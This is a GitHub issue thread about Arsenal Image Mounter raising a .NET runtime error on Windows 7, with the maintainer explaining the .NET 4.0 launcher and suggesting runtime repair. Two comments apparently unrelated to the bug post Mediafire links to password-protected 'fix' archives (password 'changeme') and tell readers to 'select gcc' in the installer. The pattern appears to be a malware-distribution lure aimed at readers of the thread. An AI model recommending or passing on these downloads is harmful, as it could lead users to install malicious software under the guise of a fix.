### ISSUE TITLE
Bug in .NET dependencies

### ISSUE THREAD

**Issue by bt4ibwem8** [ArsenalRecon/Arsenal-Image-Mounter#48]
![image](https://github.com/user-attachments/assets/c9c7eb00-799c-428c-9129-fb549d54ac7d)

I get this error when running Arsenal. I am on win7 and it uses old v4 .net runtimes in
`C:\Windows\Microsoft.NET\Framework64\v4.0.30319\` but if i run Arsenal with dotnet exec `"C:\Program Files\Arsenal-Image-Mounter-v3.11.293\ArsenalImageMounter.dll"` it uses v8.0.8 which is installed in Program files. You probably hardcoded to use old runtimes version for win7 instead of use the new v8 runtimes...
Btw in Safe mode of win7 Arsenal runs fine without this error.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LTRData** [comment]
The ArsenalImageMounter.exe file is a small .NET Framework 4.0 application that finds and loads .NET 8.0 runtime files and then starts ArsenalImageMounter.dll using that found .NET 8.0 runtime. The reason it is done this way, is that the startup 4.0 application can be the same for 32 and 64 bit architectures and that it can check whether .NET 8.0 runtimes are installed and offer to download and install them otherwise.

But this also means that you need to have a fully working .NET Framework 4.0 installed on the machine. On Windows 7, that is not present from start, you need to install it. In your case, I suspect that you may need to repair it using one of the .NET Framework 4.0 repair tools, or reinstall .NET Framework 4.8, whichever is most convenient.

If you run the .dll directly using dotnet.exe, you bypass all these checks and go directly to the .NET 8.0 main part of the application.

**Comment by bt4ibwem8** [comment]
[.NET Framework](https://dotnet.microsoft.com/en-us/download/dotnet-framework/net48) can be Runtime or must be Developer pack. There are 2 options. I reinstalled 4.8 runtime but did not help me...
Maybe there is something broken on my system because `sfc /scannow` gives me this output: **Windows Resource Protection found corrupt files but was unable to fix some of them.**
I forgot to mention if i click OK on that error, Arsenal runs just fine.

**Comment by LTRData** [comment]
Either of runtime of developer pack should be fine. You really only need runtime in this case. But yes, I suspect there is something else that could be wrong somewhere in your system and I would suggest the usual methods with sfc and dism to repair the state of it.

**Comment by bt4ibwem8** [comment]
sfc does not work, cannot repair files. And dism unfortunately does not have `/Restorehealth` option in win7, it was added in win8. Weird is in Safe mode it works good without error.
